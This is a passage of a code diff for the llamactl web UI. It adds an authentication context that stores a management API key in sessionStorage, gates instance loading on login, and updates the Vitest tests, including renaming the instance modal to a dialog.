||||
|
||||
const DUMMY_API_KEY = 'test-api-key-123'
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
window.sessionStorage.setItem('llamactl_management_key', DUMMY_API_KEY)
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('Loading State', () => {
|
||||
it('shows loading spinner while instances are being fetched', async () => {
|
||||
it('shows loading spinner while instances are being fetched', () => {
|
||||
// Mock a delayed response to test loading state
|
||||
vi.mocked(instancesApi.list).mockImplementation(() =>
|
||||
new Promise(resolve => setTimeout(() => resolve(mockInstances), 100))
|
||||
@@ -220,27 +232,5 @@ describe('InstanceList - State Management and UI Logic', () => {
|
||||
expect(await screen.findByText('Instances (3)')).toBeInTheDocument()
|
||||
expect(screen.queryByText('Loading instances...')).not.toBeInTheDocument()
|
||||
})
|
||||
|
||||
it('handles transition from error back to loaded state', async () => {
|
||||
// Start with error
|
||||
vi.mocked(instancesApi.list).mockRejectedValue(new Error('Network error'))
|
||||
|
||||
const { rerender } = renderInstanceList(mockEditInstance)
|
||||
|
||||
expect(await screen.findByText('Error loading instances')).toBeInTheDocument()
|
||||
|
||||
// Simulate recovery (e.g., retry after network recovery)
|
||||
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
|
||||
|
||||
rerender(
|
||||
<InstancesProvider>
|
||||
<InstanceList editInstance={mockEditInstance} />
|
||||
</InstancesProvider>
|
||||
)
|
||||
|
||||
// Should eventually show instances
|
||||
// Note: This test is somewhat artificial since the context handles retries
|
||||
expect(screen.getByText('Error loading instances')).toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
})
|
||||
@@ -1,23 +1,29 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen, waitFor } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import InstanceModal from '@/components/InstanceModal'
|
||||
import InstanceDialog from '@/components/InstanceDialog'
|
||||
import type { Instance } from '@/types/instance'
|
||||
|
||||
describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const mockOnSave = vi.fn()
|
||||
const mockOnOpenChange = vi.fn()
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
})
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('Create Mode', () => {
|
||||
it('validates instance name is required', async () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -25,7 +31,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
)
|
||||
|
||||
// Try to submit without name
|
||||
const saveButton = screen.getByTestId('modal-save-button')
|
||||
const saveButton = screen.getByTestId('dialog-save-button')
|
||||
expect(saveButton).toBeDisabled()
|
||||
|
||||
// Add name, button should be enabled
|
||||
@@ -41,7 +47,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -54,7 +60,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
await user.type(nameInput, 'test instance!')
|
||||
|
||||
expect(screen.getByText(/can only contain letters, numbers, hyphens, and underscores/)).toBeInTheDocument()
|
||||
expect(screen.getByTestId('modal-save-button')).toBeDisabled()
|
||||
expect(screen.getByTestId('dialog-save-button')).toBeDisabled()
|
||||
|
||||
// Clear and test valid name
|
||||
await user.clear(nameInput)
|
||||
@@ -62,7 +68,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.queryByText(/can only contain letters, numbers, hyphens, and underscores/)).not.toBeInTheDocument()
|
||||
expect(screen.getByTestId('modal-save-button')).not.toBeDisabled()
|
||||
expect(screen.getByTestId('dialog-save-button')).not.toBeDisabled()
|
||||
})
|
||||
})
|
||||
|
||||
@@ -70,7 +76,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -81,16 +87,16 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
await user.type(screen.getByLabelText(/Instance Name/), 'my-instance')
|
||||
|
||||
// Submit form
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
|
||||
auto_restart: true, // Default value
|
||||
})
|
||||
})
|
||||
|
||||
it('form resets when modal reopens', async () => {
|
||||
it('form resets when dialog reopens', async () => {
|
||||
const { rerender } = render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -101,18 +107,18 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const nameInput = screen.getByLabelText(/Instance Name/)
|
||||
await userEvent.setup().type(nameInput, 'temp-name')
|
||||
|
||||
// Close modal
|
||||
// Close dialog
|
||||
rerender(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={false}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
/>
|
||||
)
|
||||
|
||||
// Reopen modal
|
||||
// Reopen dialog
|
||||
rerender(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -138,7 +144,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
|
||||
it('pre-fills form with existing instance data', () => {
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -159,7 +165,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -168,7 +174,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
)
|
||||
|
||||
// Submit without changes
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
|
||||
model: 'test-model.gguf',
|
||||
@@ -181,7 +187,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const runningInstance: Instance = { ...mockInstance, running: true }
|
||||
|
||||
const { rerender } = render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -189,10 +195,10 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
/>
|
||||
)
|
||||
|
||||
expect(screen.getByTestId('modal-save-button')).toBeInTheDocument()
|
||||
expect(screen.getByTestId('dialog-save-button')).toBeInTheDocument()
|
||||
|
||||
rerender(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -207,7 +213,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
describe('Auto Restart Configuration', () => {
|
||||
it('shows restart options when auto restart is enabled', () => {
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -227,7 +233,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -247,7 +253,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -261,7 +267,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
await user.type(screen.getByLabelText(/Max Restarts/), '5')
|
||||
await user.type(screen.getByLabelText(/Restart Delay/), '10')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
|
||||
auto_restart: true,
|
||||
@@ -276,7 +282,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -300,7 +306,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -310,7 +316,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
// Fill only required field
|
||||
await user.type(screen.getByLabelText(/Instance Name/), 'clean-instance')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
// Should only include non-empty values
|
||||
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
|
||||
@@ -322,7 +328,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -335,7 +341,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const gpuLayersInput = screen.getByLabelText(/GPU Layers/)
|
||||
await user.type(gpuLayersInput, '15')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
|
||||
auto_restart: true,
|
||||
@@ -349,14 +355,14 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
/>
|
||||
)
|
||||
|
||||
await user.click(screen.getByTestId('modal-cancel-button'))
|
||||
await user.click(screen.getByTestId('dialog-cancel-button'))
|
||||
|
||||
expect(mockOnOpenChange).toHaveBeenCalledWith(false)
|
||||
})
|
||||
@@ -365,7 +371,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -373,7 +379,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
)
|
||||
|
||||
await user.type(screen.getByLabelText(/Instance Name/), 'test')
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalled()
|
||||
expect(mockOnOpenChange).toHaveBeenCalledWith(false)
|
||||
|
||||
webui/src/contexts/AuthContext.tsx (new file, 162 lines)
@@ -0,0 +1,162 @@
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'

interface AuthContextState {
  isAuthenticated: boolean
  isLoading: boolean
  apiKey: string | null
  error: string | null
}

interface AuthContextActions {
  login: (apiKey: string) => Promise<void>
  logout: () => void
  clearError: () => void
  validateAuth: () => Promise<boolean>
}

type AuthContextType = AuthContextState & AuthContextActions

const AuthContext = createContext<AuthContextType | undefined>(undefined)

interface AuthProviderProps {
  children: ReactNode
}

const AUTH_STORAGE_KEY = 'llamactl_management_key'

export const AuthProvider = ({ children }: AuthProviderProps) => {
  const [isAuthenticated, setIsAuthenticated] = useState(false)
  const [isLoading, setIsLoading] = useState(true)
  const [apiKey, setApiKey] = useState<string | null>(null)
  const [error, setError] = useState<string | null>(null)

  // Load auth state from sessionStorage on mount
  useEffect(() => {
    const loadStoredAuth = async () => {
      try {
        const storedKey = sessionStorage.getItem(AUTH_STORAGE_KEY)
        if (storedKey) {
          setApiKey(storedKey)
          // Validate the stored key
          const isValid = await validateApiKey(storedKey)
          if (isValid) {
            setIsAuthenticated(true)
          } else {
            // Invalid key, remove it
            sessionStorage.removeItem(AUTH_STORAGE_KEY)
            setApiKey(null)
          }
        }
      } catch (err) {
        console.error('Error loading stored auth:', err)
        // Clear potentially corrupted storage
        sessionStorage.removeItem(AUTH_STORAGE_KEY)
      } finally {
        setIsLoading(false)
      }
    }

    void loadStoredAuth()
  }, [])

  // Validate API key by making a test request
  const validateApiKey = async (key: string): Promise<boolean> => {
    try {
      const response = await fetch('/api/v1/instances', {
        headers: {
          'Authorization': `Bearer ${key}`,
          'Content-Type': 'application/json'
        }
      })

      return response.ok
    } catch (err) {
      console.error('Auth validation error:', err)
      return false
    }
  }

  const login = useCallback(async (key: string) => {
    setIsLoading(true)
    setError(null)

    try {
      // Validate the provided API key
      const isValid = await validateApiKey(key)

      if (!isValid) {
        throw new Error('Invalid API key')
      }

      // Store the key and update state
      sessionStorage.setItem(AUTH_STORAGE_KEY, key)
      setApiKey(key)
      setIsAuthenticated(true)
    } catch (err) {
      const errorMessage = err instanceof Error ? err.message : 'Authentication failed'
      setError(errorMessage)
      throw new Error(errorMessage)
    } finally {
      setIsLoading(false)
    }
  }, [])

  const logout = useCallback(() => {
    sessionStorage.removeItem(AUTH_STORAGE_KEY)
    setApiKey(null)
    setIsAuthenticated(false)
    setError(null)
  }, [])

  const clearError = useCallback(() => {
    setError(null)
  }, [])

  const validateAuth = useCallback(async (): Promise<boolean> => {
    if (!apiKey) return false

    const isValid = await validateApiKey(apiKey)
    if (!isValid) {
      logout()
    }
    return isValid
  }, [apiKey, logout])

  const value: AuthContextType = {
    isAuthenticated,
    isLoading,
    apiKey,
    error,
    login,
    logout,
    clearError,
    validateAuth,
  }

  return (
    <AuthContext.Provider value={value}>
      {children}
    </AuthContext.Provider>
  )
}

export const useAuth = (): AuthContextType => {
  const context = useContext(AuthContext)
  if (context === undefined) {
    throw new Error('useAuth must be used within an AuthProvider')
  }
  return context
}

// Helper hook for getting auth headers
export const useAuthHeaders = (): HeadersInit => {
  const { apiKey, isAuthenticated } = useAuth()

  if (!isAuthenticated || !apiKey) {
    return {}
  }

  return {
    'Authorization': `Bearer ${apiKey}`
  }
}
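(Not part of the changeset above; a minimal sketch of how the new context might be consumed. The component name and markup are hypothetical.)

    import { useAuth } from '@/contexts/AuthContext'

    // Hypothetical login widget built on the AuthProvider added above
    const LoginExample = () => {
      const { isAuthenticated, isLoading, error, login, logout } = useAuth()

      if (isLoading) return <p>Checking stored key...</p>
      if (isAuthenticated) return <button onClick={logout}>Log out</button>

      return (
        <form
          onSubmit={(e) => {
            e.preventDefault()
            const key = new FormData(e.currentTarget).get('key') as string
            // login() validates the key against /api/v1/instances and stores it in sessionStorage
            void login(key)
          }}
        >
          <input name="key" type="password" placeholder="Management API key" />
          {error && <p>{error}</p>}
          <button type="submit">Log in</button>
        </form>
      )
    }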
@@ -1,7 +1,7 @@
-import type { ReactNode } from 'react';
-import { createContext, useContext, useState, useEffect, useCallback } from 'react'
+import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
 import type { CreateInstanceOptions, Instance } from '@/types/instance'
 import { instancesApi } from '@/lib/api'
+import { useAuth } from '@/contexts/AuthContext'
 
 interface InstancesContextState {
   instances: Instance[]
@@ -29,6 +29,7 @@ interface InstancesProviderProps {
 }
 
 export const InstancesProvider = ({ children }: InstancesProviderProps) => {
+  const { isAuthenticated, isLoading: authLoading } = useAuth()
   const [instancesMap, setInstancesMap] = useState<Map<string, Instance>>(new Map())
   const [loading, setLoading] = useState(true)
   const [error, setError] = useState<string | null>(null)
@@ -41,6 +42,11 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
   }, [])
 
   const fetchInstances = useCallback(async () => {
+    if (!isAuthenticated) {
+      setLoading(false)
+      return
+    }
+
     try {
       setLoading(true)
       setError(null)
@@ -57,7 +63,7 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     } finally {
       setLoading(false)
     }
-  }, [])
+  }, [isAuthenticated])
 
   const updateInstanceInMap = useCallback((name: string, updates: Partial<Instance>) => {
     setInstancesMap(prev => {
@@ -154,9 +160,19 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
     }
   }, [])
 
+  // Only fetch instances when auth is ready and user is authenticated
   useEffect(() => {
-    fetchInstances()
-  }, [fetchInstances])
+    if (!authLoading) {
+      if (isAuthenticated) {
+        void fetchInstances()
+      } else {
+        // Clear instances when not authenticated
+        setInstancesMap(new Map())
+        setLoading(false)
+        setError(null)
+      }
+    }
+  }, [authLoading, isAuthenticated, fetchInstances])
 
   const value: InstancesContextType = {
     instances,
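(Illustrative only, not in the diff: a hypothetical consumer of the provider, restricted to fields the tests below exercise.)

    import { useInstances } from '@/contexts/InstancesContext'

    // Assumes it renders inside <AuthProvider><InstancesProvider>...</InstancesProvider></AuthProvider>
    const InstanceListExample = () => {
      const { instances, loading, error, startInstance, stopInstance } = useInstances()

      if (loading) return <p>Loading instances...</p>
      if (error) return <p>Error: {error}</p>

      return (
        <ul>
          {instances.map((i) => (
            <li key={i.name}>
              {i.name} ({i.running ? 'running' : 'stopped'}){' '}
              <button onClick={() => void (i.running ? stopInstance(i.name) : startInstance(i.name))}>
                {i.running ? 'Stop' : 'Start'}
              </button>
            </li>
          ))}
        </ul>
      )
    }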
@@ -1,12 +1,13 @@
-import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
-import { render, screen, waitFor } from '@testing-library/react'
-import type { ReactNode } from 'react'
-import { InstancesProvider, useInstances } from '@/contexts/InstancesContext'
-import { instancesApi } from '@/lib/api'
-import type { Instance } from '@/types/instance'
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
+import { render, screen, waitFor } from "@testing-library/react";
+import type { ReactNode } from "react";
+import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
+import { instancesApi } from "@/lib/api";
+import type { Instance } from "@/types/instance";
+import { AuthProvider } from "../AuthContext";
 
 // Mock the API module
-vi.mock('@/lib/api', () => ({
+vi.mock("@/lib/api", () => ({
   instancesApi: {
     list: vi.fn(),
     create: vi.fn(),
@@ -15,8 +16,8 @@ vi.mock('@/lib/api', () => ({
     stop: vi.fn(),
     restart: vi.fn(),
     delete: vi.fn(),
-  }
-}))
+  },
+}));
 
 // Test component to access context
 function TestComponent() {
@@ -30,366 +31,389 @@ function TestComponent() {
    stopInstance,
    restartInstance,
    deleteInstance,
    clearError,
  } = useInstances();

  return (
    <div>
      <div data-testid="loading">{loading.toString()}</div>
      <div data-testid="error">{error || "no-error"}</div>
      <div data-testid="instances-count">{instances.length}</div>
      {instances.map((instance) => (
        <div key={instance.name} data-testid={`instance-${instance.name}`}>
          {instance.name}:{instance.running.toString()}
        </div>
      ))}

      {/* Action buttons for testing with specific instances */}
      <button
        onClick={() => createInstance("new-instance", { model: "test.gguf" })}
        data-testid="create-instance"
      >
        Create Instance
      </button>
      <button
        onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
        data-testid="update-instance"
      >
        Update Instance
      </button>
      <button
        onClick={() => startInstance("instance2")}
        data-testid="start-instance"
      >
        Start Instance2
      </button>
      <button
        onClick={() => stopInstance("instance1")}
        data-testid="stop-instance"
      >
        Stop Instance1
      </button>
      <button
        onClick={() => restartInstance("instance1")}
        data-testid="restart-instance"
      >
        Restart Instance1
      </button>
      <button
        onClick={() => deleteInstance("instance2")}
        data-testid="delete-instance"
      >
        Delete Instance2
      </button>
      <button onClick={clearError} data-testid="clear-error">
        Clear Error
      </button>
    </div>
  );
}

function renderWithProvider(children: ReactNode) {
  return render(
    <AuthProvider>
      <InstancesProvider>{children}</InstancesProvider>
    </AuthProvider>
  );
}

describe("InstancesContext", () => {
  const mockInstances: Instance[] = [
    { name: "instance1", running: true, options: { model: "model1.gguf" } },
    { name: "instance2", running: false, options: { model: "model2.gguf" } },
  ];

  beforeEach(() => {
    vi.clearAllMocks();
    window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123');
    global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })));
    // Default successful API responses
    vi.mocked(instancesApi.list).mockResolvedValue(mockInstances);
  });

  afterEach(() => {
    vi.restoreAllMocks();
  });

  describe("Initial Loading", () => {
    it("loads instances on mount", async () => {
      renderWithProvider(<TestComponent />);

      // Should start loading
      expect(screen.getByTestId("loading")).toHaveTextContent("true");

      // Should fetch instances
      await waitFor(() => {
        expect(instancesApi.list).toHaveBeenCalledOnce();
      });

      // Should display loaded instances
      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
        expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
          "instance1:true"
        );
        expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
          "instance2:false"
        );
      });
    });

    it("handles API error during initial load", async () => {
      const errorMessage = "Network error";
      vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
        expect(screen.getByTestId("instances-count")).toHaveTextContent("0");
      });
    });
  });

  describe("Create Instance", () => {
    it("creates instance and adds it to state", async () => {
      const newInstance: Instance = {
        name: "new-instance",
        running: false,
        options: { model: "test.gguf" },
      };
      vi.mocked(instancesApi.create).mockResolvedValue(newInstance);

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      });

      screen.getByTestId("create-instance").click();

      await waitFor(() => {
        expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
          model: "test.gguf",
        });
      });

      await waitFor(() => {
        expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
        expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
          "new-instance:false"
        );
      });
    });

    it("handles create instance error without changing state", async () => {
      const errorMessage = "Instance already exists";
      vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage));

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      });

      screen.getByTestId("create-instance").click();

      await waitFor(() => {
        expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
      });

      expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      expect(
        screen.queryByTestId("instance-new-instance")
      ).not.toBeInTheDocument();
    });
  });

  describe("Update Instance", () => {
    it("updates instance and maintains it in state", async () => {
      const updatedInstance: Instance = {
        name: "instance1",
        running: true,
        options: { model: "updated.gguf" },
      };
      vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      });

      screen.getByTestId("update-instance").click();

      await waitFor(() => {
        expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
          model: "updated.gguf",
        });
      });

      await waitFor(() => {
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
        expect(screen.getByTestId("instance-instance1")).toBeInTheDocument();
      });
    });
  });

  describe("Start/Stop Instance", () => {
    it("starts existing instance and updates its running state", async () => {
      vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        // instance2 starts as not running
        expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
          "instance2:false"
        );
      });

      // Start instance2 (button already configured to start instance2)
      screen.getByTestId("start-instance").click();

      await waitFor(() => {
        expect(instancesApi.start).toHaveBeenCalledWith("instance2");
        // The running state should be updated to true
        expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
          "instance2:true"
        );
      });
    });

    it("stops instance and updates running state to false", async () => {
      vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance);

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        // instance1 starts as running
        expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
          "instance1:true"
        );
      });

      // Stop instance1 (button already configured to stop instance1)
      screen.getByTestId("stop-instance").click();

      await waitFor(() => {
        expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
        // The running state should be updated to false
        expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
          "instance1:false"
        );
      });
    });

    it("handles start instance error", async () => {
      const errorMessage = "Failed to start instance";
      vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage));

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
      });

      screen.getByTestId("start-instance").click();

      await waitFor(() => {
        expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
      });
    });
  });

  describe("Delete Instance", () => {
    it("deletes instance and removes it from state", async () => {
      vi.mocked(instancesApi.delete).mockResolvedValue(undefined);

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
        expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
      });

      screen.getByTestId("delete-instance").click();

      await waitFor(() => {
        expect(instancesApi.delete).toHaveBeenCalledWith("instance2");
      });

      await waitFor(() => {
        expect(screen.getByTestId("instances-count")).toHaveTextContent("1");
        expect(
          screen.queryByTestId("instance-instance2")
        ).not.toBeInTheDocument();
        expect(screen.getByTestId("instance-instance1")).toBeInTheDocument(); // instance1 should still exist
      });
    });

    it("handles delete instance error without changing state", async () => {
      const errorMessage = "Instance is running";
      vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage));

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      });

      screen.getByTestId("delete-instance").click();

      await waitFor(() => {
        expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
      });

      expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
    });
  });

  describe("Error Management", () => {
    it("clears error when clearError is called", async () => {
      const errorMessage = "Test error";
      vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
      });

      screen.getByTestId("clear-error").click();

      await waitFor(() => {
        expect(screen.getByTestId("error")).toHaveTextContent("no-error");
      });
    });
  });

  describe("State Consistency", () => {
    it("maintains consistent state during multiple operations", async () => {
      // Test that operations don't interfere with each other
      const newInstance: Instance = {
        name: "new-instance",
        running: false,
        options: {},
      };
      vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
      vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);

      renderWithProvider(<TestComponent />);

      await waitFor(() => {
        expect(screen.getByTestId("loading")).toHaveTextContent("false");
        expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
      });

      // Create new instance
      screen.getByTestId("create-instance").click();

      await waitFor(() => {
        expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
      });

      // Start an instance (this should not affect the count)
      screen.getByTestId("start-instance").click();

      await waitFor(() => {
        expect(instancesApi.start).toHaveBeenCalled();
        expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
        // But the running state should change
        expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
          "instance2:true"
        );
      });
    });
  });
});
@@ -10,18 +10,31 @@ async function apiCall<T>(
 ): Promise<T> {
   const url = `${API_BASE}${endpoint}`;
 
-  // Prepare headers
-  const headers: HeadersInit = {
+  // Get auth token from sessionStorage (same as AuthContext)
+  const storedKey = sessionStorage.getItem('llamactl_management_key');
+
+  // Prepare headers with auth
+  const headers: Record<string, string> = {
     "Content-Type": "application/json",
-    ...options.headers,
